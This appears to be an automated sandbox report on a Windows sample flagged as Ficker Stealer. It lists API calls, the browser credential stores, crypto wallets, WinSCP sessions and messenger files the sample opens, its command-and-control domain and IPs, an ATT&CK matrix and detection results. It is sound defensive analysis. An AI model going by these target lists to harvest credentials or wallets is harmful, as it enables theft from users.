      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004157AC LoadLibraryA,GetProcAddress,GetProcAddress,CreateMutexA,memset,GetUserDefaultLocaleName,LoadLibraryA,LoadLibraryA,GetProcAddress,URLDownloadToFileA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,memset,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,GetLastError,GetComputerNameW,GetDesktopWindow,GetWindowRect,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesW,GetTimeZoneInformation,GetKeyboardLayoutList,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,CloseHandle,CloseHandle,GetProcessHeap,GetSystemMetrics,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,closesocket,closesocket,memset,SetLastError,GetTempPathW,GetLastError,GetLastError,CloseHandle,LoadLibraryA,GetProcAddress,CreateProcessA,closesocket,GetLastError,3_2_004157AC
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339808670.000000000082F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW,
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWp6
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_004020C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_004020C8
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_004112C5 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,2_2_004112C5
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_00423341 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_00423341
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_0041B841 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041B841
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_004020C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_004020C8
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_00403994 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00403994
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_0040AD9D SetUnhandledExceptionFilter,2_2_0040AD9D
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_0040115C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,3_2_0040115C
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00401150 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,3_2_00401150
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,3_2_004013C9
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00434F7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,3_2_00434F7C
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_00434F80 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,3_2_00434F80
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeProcess created: C:\Users\user\Desktop\8s7bEDfYhT.exe 'C:\Users\user\Desktop\8s7bEDfYhT.exe' Jump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: GetLocaleInfoW,2_2_0042207D
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: EnumSystemLocalesA,2_2_0041E804
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,2_2_0041C824
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0041E82E
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,2_2_0041E8D1
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0041E895
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,2_2_00422096
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_0041C1B6
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: GetLocaleInfoA,2_2_00424A53
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,2_2_0041CAAF
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_0041E34C
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,2_2_004113CD
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_0041E463
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,2_2_0041E4FB
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: GetLocaleInfoA,2_2_00423D45
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_0041E56F
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,2_2_0041CD75
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: LCMapStringA,GetLocaleInfoW,2_2_0044CEC0
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_0041E741
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,CreateMutexA,memset,GetUserDefaultLocaleName,LoadLibraryA,LoadLibraryA,GetProcAddress,URLDownloadToFileA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,memset,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,GetLastError,GetComputerNameW,GetDesktopWindow,GetWindowRect,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesW,GetTimeZoneInformation,GetKeyboardLayoutList,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,CloseHandle,CloseHandle,GetProcessHeap,GetSystemMetrics,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,closesocket,closesocket,memset,SetLastError,GetTempPathW,GetLastError,GetLastError,CloseHandle,LoadLibraryA,GetProcAddress,CreateProcessA,closesocket,GetLastError,3_2_004157AC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_0040B896 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0040B896
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 2_2_00424116 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,2_2_00424116
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected Ficker StealerShow sources
      Source: Yara matchFile source: 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 8s7bEDfYhT.exe PID: 6572, type: MEMORY
      Found many strings related to Crypto-Wallets (likely being stolen)Show sources
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\walletsDatakings
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350451817.000000000082F000.00000004.00000020.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: Update for Microsoft Office 2016 (KB3178666) 32-Bit Editioning\Exodus\exodus.walletINetCacheA
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystoreettingsB
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: Update for Microsoft Office 2016 (KB3178666) 32-Bit Editioning\Exodus\exodus.walletINetCacheA
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystoreettingsB
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystoreettingsB
      Tries to harvest and steal Bitcoin Wallet informationShow sources
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local StateJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Local StateJump to behavior
      Tries to steal Instant Messenger accounts or passwordsShow sources
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior

      Remote Access Functionality:

      barindex
      Yara detected Ficker StealerShow sources
      Source: Yara matchFile source: 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 8s7bEDfYhT.exe PID: 6572, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsProcess Injection11Obfuscated Files or Information3Credentials in Registry2File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing22Credentials In Files1System Information Discovery44SMB/Windows Admin SharesScreen Capture1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSecurity Software Discovery21Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection11LSA SecretsProcess Discovery12SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      8s7bEDfYhT.exe56%VirustotalBrowse
      8s7bEDfYhT.exe90%ReversingLabsWin32.Trojan.Graftor
      8s7bEDfYhT.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      2.2.8s7bEDfYhT.exe.4915a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

      Domains

      SourceDetectionScannerLabelLink
      sodaandcoke.top7%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      sodaandcoke.top:807%VirustotalBrowse
      sodaandcoke.top:800%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      elb097307-934924932.us-east-1.elb.amazonaws.com
      54.225.155.255
      truefalse
        high
        sodaandcoke.top
        35.203.73.169
        truefalseunknown
        api.ipify.org
        unknown
        unknownfalse
          high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          sodaandcoke.top:80true
          • 7%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://api.ipify.org/?format=xmlfalse
            high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://api.ipify.org/?format=xmliC:8s7bEDfYhT.exe, 00000003.00000003.339794600.0000000000827000.00000004.00000001.sdmpfalse
              high
              http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl8s7bEDfYhT.exe, 00000003.00000002.350451817.000000000082F000.00000004.00000020.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                54.225.155.255
                elb097307-934924932.us-east-1.elb.amazonaws.comUnited States
                14618AMAZON-AESUSfalse
                35.203.73.169
                sodaandcoke.topUnited States
                15169GOOGLEUSfalse

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:397819
                Start date:26.04.2021
                Start time:13:11:19
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 2s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:8s7bEDfYhT.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.phis.troj.spyw.evad.winEXE@3/2@3/2
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 95.1% (good quality ratio 91.4%)
                • Quality average: 84.8%
                • Quality standard deviation: 25.3%
                HCA Information:
                • Successful, ratio: 90%
                • Number of executed functions: 39
                • Number of non-executed functions: 49
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 20.82.210.154, 131.253.33.200, 13.107.22.200, 168.61.161.212, 104.43.139.144, 23.54.113.53, 40.88.32.150, 52.255.188.83, 13.107.4.50
                • Excluded domains from analysis (whitelisted): www.bing.com, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, skypedataprdcolcus17.cloudapp.net, store-images.s-microsoft.com-c.edgekey.net, c-0001.c-msedge.net, skypedataprdcolcus16.cloudapp.net, download.windowsupdate.com, b1ns.c-0001.c-msedge.net, wu-fg-shim.trafficmanager.net, arc.msn.com, dual-a-0001.dc-msedge.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, b1ns.au-msedge.net
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                54.225.155.255oddMyFn53m.exeGet hashmaliciousBrowse
                • api.ipify.org/?format=xml
                SecuriteInfo.com.Trojan.PWS.Siggen2.63308.20752.exeGet hashmaliciousBrowse
                • api.ipify.org/?format=xml
                conn.exeGet hashmaliciousBrowse
                • api.ipify.org/
                ZZXJzDEmZ2.exeGet hashmaliciousBrowse
                • api.ipify.org/?format=xml
                2.exeGet hashmaliciousBrowse
                • api.ipify.org/
                Static.dllGet hashmaliciousBrowse
                • api.ipify.org/?format=xml
                Static.dllGet hashmaliciousBrowse
                • api.ipify.org/

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                elb097307-934924932.us-east-1.elb.amazonaws.com8c6b2adbcdd8b7f0a0419fd08e5cbd0f7bc52cc702da4.exeGet hashmaliciousBrowse
                • 107.22.233.72
                S1g5ShTDXD.exeGet hashmaliciousBrowse
                • 54.243.121.36
                RykzV2Bdm0.exeGet hashmaliciousBrowse
                • 107.22.233.72
                9fc4c09d4cb89762626fce008d9840abb128c99ec3cd1.exeGet hashmaliciousBrowse
                • 54.243.121.36
                eiMDpf6wV6.exeGet hashmaliciousBrowse
                • 54.225.169.203
                vVNILsHyqm.exeGet hashmaliciousBrowse
                • 50.16.249.42
                FxHNFwShW0.exeGet hashmaliciousBrowse
                • 54.225.165.85
                CvzZ4YD5k2.exeGet hashmaliciousBrowse
                • 54.225.144.221
                fJWSjgc7FE.exeGet hashmaliciousBrowse
                • 54.225.169.203
                t0G5Ovl9TW.exeGet hashmaliciousBrowse
                • 54.235.83.248
                5YB4gJt3c7.exeGet hashmaliciousBrowse
                • 107.22.233.72
                NEW SUPPLIER FORM.exeGet hashmaliciousBrowse
                • 23.21.252.4
                bxJIU2nFC5.exeGet hashmaliciousBrowse
                • 54.243.121.36
                KoF2fbpF8X.exeGet hashmaliciousBrowse
                • 23.21.48.44
                oddMyFn53m.exeGet hashmaliciousBrowse
                • 54.225.155.255
                kBB0LJe6UO.exeGet hashmaliciousBrowse
                • 54.235.175.90
                078y61cSKy.exeGet hashmaliciousBrowse
                • 50.19.242.215
                svchost.exeGet hashmaliciousBrowse
                • 54.225.144.221

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                AMAZON-AESUSVIKRAMQST21-222.exeGet hashmaliciousBrowse
                • 3.223.115.185
                confirm this order and sign PI.exeGet hashmaliciousBrowse
                • 18.234.20.125
                cZthzZwzJz.exeGet hashmaliciousBrowse
                • 54.90.47.105
                raw.exeGet hashmaliciousBrowse
                • 52.0.217.44
                outstanding invoices pdf.exeGet hashmaliciousBrowse
                • 3.223.115.185
                8c6b2adbcdd8b7f0a0419fd08e5cbd0f7bc52cc702da4.exeGet hashmaliciousBrowse
                • 107.22.233.72
                S1g5ShTDXD.exeGet hashmaliciousBrowse
                • 54.243.121.36
                RykzV2Bdm0.exeGet hashmaliciousBrowse
                • 107.22.233.72
                9fc4c09d4cb89762626fce008d9840abb128c99ec3cd1.exeGet hashmaliciousBrowse
                • 54.243.121.36
                B9ECF028C9852A52CD1006E34AF3ACB7F5A6A486796AB.dllGet hashmaliciousBrowse
                • 54.197.173.238
                7CED0B0A92826F1C1E453A75081436AFEF64CE3825885.dllGet hashmaliciousBrowse
                • 54.197.173.238
                espn.htmlGet hashmaliciousBrowse
                • 54.146.31.126
                _V2mailPhone_map435465.htmlGet hashmaliciousBrowse
                • 52.20.98.49
                eiMDpf6wV6.exeGet hashmaliciousBrowse
                • 54.225.169.203
                vVNILsHyqm.exeGet hashmaliciousBrowse
                • 50.16.249.42
                Invoice.exeGet hashmaliciousBrowse
                • 52.200.25.77
                BOMvWNALpb.docxGet hashmaliciousBrowse
                • 54.83.52.76
                MV UNIVERSE-VSLS PARTICULARS.xlsxGet hashmaliciousBrowse
                • 3.223.115.185
                BOMvWNALpb.docxGet hashmaliciousBrowse
                • 54.83.52.76
                FxHNFwShW0.exeGet hashmaliciousBrowse
                • 54.225.165.85

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\ProgramData\kaosdma.txt
                Process:C:\Users\user\Desktop\8s7bEDfYhT.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):10
                Entropy (8bit):2.8464393446710154
                Encrypted:false
                SSDEEP:3:HLLr:fr
                MD5:60B1FCE0F5D79C061DD6FECDAC64F306
                SHA1:1DF9D4411BEDD84FF3C6E6F41988F4CF6CC0D67F
                SHA-256:3C0ACD03C25C6940300B9A18362B6893BC7A5C11EE8F3140868E143ADBB4B8EE
                SHA-512:7B292792E06696C3B14539D800D4D2926DA2C3C30447D8AEED9E863174BAD3871CEEE19BC832F31A69A574AB3394C4ADF2B1C10A6F96140AD1AE6D2440E905A1
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: 84.17.52.3
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\B6RX3BI4.txt
